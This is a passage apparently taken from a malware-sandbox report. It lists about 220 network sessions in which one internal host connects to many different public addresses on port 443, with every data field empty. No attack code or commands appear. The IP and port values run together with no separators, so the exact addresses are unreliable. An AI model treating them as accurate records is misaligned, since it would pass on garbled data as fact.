                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28394192.168.2.23586002.96.167.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28395192.168.2.2345840147.150.27.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28396192.168.2.233354280.157.84.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28397192.168.2.235992639.173.15.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28398192.168.2.2345082204.79.115.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28399192.168.2.2334546197.11.121.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28400192.168.2.235212249.219.180.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28401192.168.2.2357474157.206.134.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28402192.168.2.2343360111.152.179.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28403192.168.2.2333332148.163.71.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28404192.168.2.2339014135.232.30.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28405192.168.2.23558709.138.193.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28406192.168.2.2360504184.7.102.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28407192.168.2.235026698.46.157.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28408192.168.2.2356408118.204.102.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28409192.168.2.235588619.159.81.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28410192.168.2.23331084.220.190.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28411192.168.2.234046885.240.152.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28412192.168.2.2352960169.35.2.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28413192.168.2.2351048137.158.35.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28414192.168.2.2349232133.157.85.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28415192.168.2.2340786144.77.77.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28416192.168.2.2358254171.122.75.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28417192.168.2.233363632.167.13.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28418192.168.2.234415697.142.24.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28419192.168.2.2347300171.220.133.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28420192.168.2.235222253.38.130.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28421192.168.2.2357778143.209.119.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28422192.168.2.233620852.154.107.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28423192.168.2.233849865.157.194.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28424192.168.2.2336760153.56.243.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28425192.168.2.23403929.43.60.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28426192.168.2.2360148173.60.201.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28427192.168.2.2348910101.29.244.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28428192.168.2.2337494178.150.28.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28429192.168.2.2341726165.26.138.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28430192.168.2.2352054110.22.217.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28431192.168.2.235261045.111.147.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28432192.168.2.2358488133.27.145.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28433192.168.2.234250454.197.143.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28434192.168.2.2344350186.219.149.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28435192.168.2.2349454182.34.167.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28436192.168.2.2360962195.48.230.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28437192.168.2.2348784137.35.40.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28438192.168.2.2338438222.202.2.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28439192.168.2.2359550171.74.147.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28440192.168.2.235783627.70.250.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28441192.168.2.233327497.41.97.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28442192.168.2.2353286115.92.221.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28443192.168.2.233596070.202.96.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28444192.168.2.2344928135.78.27.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28445192.168.2.2335110188.9.22.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28446192.168.2.234234876.236.29.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28447192.168.2.23587402.143.87.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28448192.168.2.2353928152.249.68.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28449192.168.2.2339078132.196.3.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28450192.168.2.2336128143.166.218.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28451192.168.2.235456814.58.206.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28452192.168.2.233878293.208.56.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28453192.168.2.235497680.214.225.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28454192.168.2.2345130119.89.79.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28455192.168.2.235644237.206.187.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28456192.168.2.23545962.75.139.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28457192.168.2.2349304208.59.40.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28458192.168.2.2334638101.132.97.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28459192.168.2.235457417.19.78.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28460192.168.2.2340126144.28.158.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28461192.168.2.233458640.66.24.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28462192.168.2.2335688166.206.96.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28463192.168.2.2334466113.150.68.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28464192.168.2.2344556209.202.108.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28465192.168.2.2355116124.138.184.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28466192.168.2.2341874203.107.139.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28467192.168.2.2353902112.126.201.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28468192.168.2.236055243.2.209.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28469192.168.2.2352800100.172.176.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28470192.168.2.235193486.0.39.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28471192.168.2.234617495.235.191.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28472192.168.2.233979432.120.204.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28473192.168.2.2360380221.254.141.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28474192.168.2.2343420201.47.255.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28475192.168.2.2345950196.211.199.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28476192.168.2.235088694.95.153.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28477192.168.2.233875438.251.100.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28478192.168.2.2353300170.39.32.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28479192.168.2.2353224168.149.33.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28480192.168.2.2355912138.187.227.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28481192.168.2.2357702218.236.97.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28482192.168.2.2354004165.141.251.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28483192.168.2.234032064.120.144.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28484192.168.2.233400071.248.142.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28485192.168.2.2345386153.220.148.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28486192.168.2.234652823.210.186.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28487192.168.2.233922857.21.94.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28488192.168.2.235006650.97.79.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28489192.168.2.235787646.200.107.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28490192.168.2.2334274161.123.78.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28491192.168.2.233549062.158.230.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28492192.168.2.2357618126.166.188.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28493192.168.2.2352132213.134.230.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28494192.168.2.2341466124.245.172.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28495192.168.2.234085865.121.27.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28496192.168.2.2359246160.65.223.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28497192.168.2.2343122198.70.66.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28498192.168.2.2339076154.140.10.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28499192.168.2.23552125.166.198.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28500192.168.2.2339596113.53.82.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28501192.168.2.2356430151.215.248.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28502192.168.2.235060289.110.190.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28503192.168.2.2357010195.48.133.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28504192.168.2.2342518179.164.240.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28505192.168.2.2338252159.150.161.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28506192.168.2.233685284.253.191.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28507192.168.2.234079820.196.235.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28508192.168.2.235799625.27.233.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28509192.168.2.2348532212.92.164.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28510192.168.2.2356782202.206.154.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28511192.168.2.2357826198.23.78.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28512192.168.2.2346438208.152.254.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28513192.168.2.2354876125.238.58.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28514192.168.2.23352205.182.50.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28515192.168.2.235815495.14.230.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28516192.168.2.2349954153.76.90.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28517192.168.2.2333352144.128.4.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28518192.168.2.235527819.143.57.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28519192.168.2.2352610125.193.40.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28520192.168.2.233586670.230.251.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28521192.168.2.2350972103.227.56.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28522192.168.2.2357850193.191.16.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28523192.168.2.2348680209.54.31.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28524192.168.2.2342540155.143.242.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28525192.168.2.2338558120.195.46.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28526192.168.2.235474881.24.90.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28527192.168.2.2338838115.78.140.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28528192.168.2.2355136190.83.131.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28529192.168.2.23481682.241.62.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28530192.168.2.2354248130.59.194.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28531192.168.2.233466259.194.159.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28532192.168.2.2343668202.198.187.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28533192.168.2.235639091.197.99.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28534192.168.2.2356714109.131.88.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28535192.168.2.2355514143.63.92.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28536192.168.2.2350206146.21.30.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28537192.168.2.234027620.45.97.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28538192.168.2.2350692132.218.25.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28539192.168.2.233915675.25.106.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28540192.168.2.234849451.28.255.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28541192.168.2.2342378119.168.241.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28542192.168.2.2344202112.121.40.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28543192.168.2.2359438213.213.7.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28544192.168.2.2354692193.58.114.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28545192.168.2.2349554157.229.185.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28546192.168.2.233425470.224.11.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28547192.168.2.2333352179.122.145.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28548192.168.2.234304454.117.79.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28549192.168.2.2356864192.235.120.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28550192.168.2.234366012.243.57.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28551192.168.2.235346097.95.242.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28552192.168.2.235538875.129.255.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28553192.168.2.2343130113.157.5.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28554192.168.2.235031663.47.229.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28555192.168.2.2349018131.155.115.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28556192.168.2.235244843.188.153.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28557192.168.2.2335520191.102.56.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28558192.168.2.2360694147.189.51.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28559192.168.2.234880858.43.165.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28560192.168.2.2344146138.73.95.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28561192.168.2.235200470.112.113.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28562192.168.2.2334392212.107.38.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28563192.168.2.234530481.243.76.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28564192.168.2.234722889.64.232.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28565192.168.2.235056252.200.115.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28566192.168.2.2333836220.29.24.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28567192.168.2.2340742134.54.14.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28568192.168.2.234217844.163.64.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28569192.168.2.234509435.91.9.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28570192.168.2.235692434.183.110.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28571192.168.2.2342828175.125.81.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28572192.168.2.234771886.115.80.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28573192.168.2.2356530165.111.226.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28574192.168.2.2350976217.228.229.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28575192.168.2.2349662125.64.178.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28576192.168.2.2341060161.97.106.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28577192.168.2.2332874161.84.226.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28578192.168.2.2345374112.43.170.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28579192.168.2.234062060.230.223.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28580192.168.2.2352292217.21.200.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28581192.168.2.235984259.4.228.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28582192.168.2.2339672189.80.15.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28583192.168.2.2350712194.113.151.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28584192.168.2.23415624.62.162.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28585192.168.2.235286893.63.67.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28586192.168.2.2342446172.250.60.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28587192.168.2.23581209.28.179.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28588192.168.2.234256481.156.214.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28589192.168.2.2353548113.175.67.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28590192.168.2.2345296158.45.155.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28591192.168.2.234140092.235.125.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28592192.168.2.2360454115.83.91.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28593192.168.2.2354688114.164.77.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28594192.168.2.23520485.101.75.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28595192.168.2.234385046.230.103.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28596192.168.2.2334302154.30.110.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28597192.168.2.234756095.119.198.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28598192.168.2.2360752178.69.55.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28599192.168.2.235666691.190.224.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28600192.168.2.234716460.125.145.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28601192.168.2.2344832176.62.126.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28602192.168.2.2355028106.73.3.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28603192.168.2.235143644.210.224.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28604192.168.2.23446704.80.153.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28605192.168.2.2358084204.39.28.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28606192.168.2.2346286106.13.205.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28607192.168.2.23415309.80.80.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28608192.168.2.2342218205.239.193.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28609192.168.2.2343006207.164.13.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28610192.168.2.2349696128.169.156.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28611192.168.2.233381635.52.18.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28612192.168.2.2354222141.71.7.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28613192.168.2.2348592133.21.188.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28614192.168.2.2336680180.77.225.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
